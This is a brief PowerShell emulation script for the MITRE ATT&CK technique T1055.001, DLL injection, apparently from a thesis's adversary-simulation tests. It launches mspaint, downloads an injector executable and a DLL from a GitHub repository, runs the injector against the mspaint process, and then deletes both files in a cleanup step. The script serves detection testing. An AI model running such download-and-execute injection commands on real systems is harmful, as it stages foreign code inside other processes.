Process Injection: Dynamic-link Library Injection (T1055.001)

POWERSHELL
---------------------------------------------------
mspaint
Invoke-WebRequest -Uri https://github.com/PaulaMerino/TFM/raw/main/exec/dllcodeInjection.exe -OutFile "$env:USERPROFILE\Downloads\dllcodeInjection.exe"
Invoke-WebRequest -Uri https://github.com/PaulaMerino/TFM/raw/main/exec/dllExampleInjection2.dll -OutFile "$env:USERPROFILE\dllExampleInjection.dll"
& "$env:USERPROFILE\Downloads\dllcodeInjection.exe" (Get-Process | ?{$_.ProcessName -eq "mspaint"} | Select-Object -ExpandProperty Id)


CLEAN UP 
Remove-Item "$env:USERPROFILE\Downloads\dllcodeInjection.exe" 
Remove-Item "$env:USERPROFILE\dllExampleInjection.dll" 
---------------------------------------------------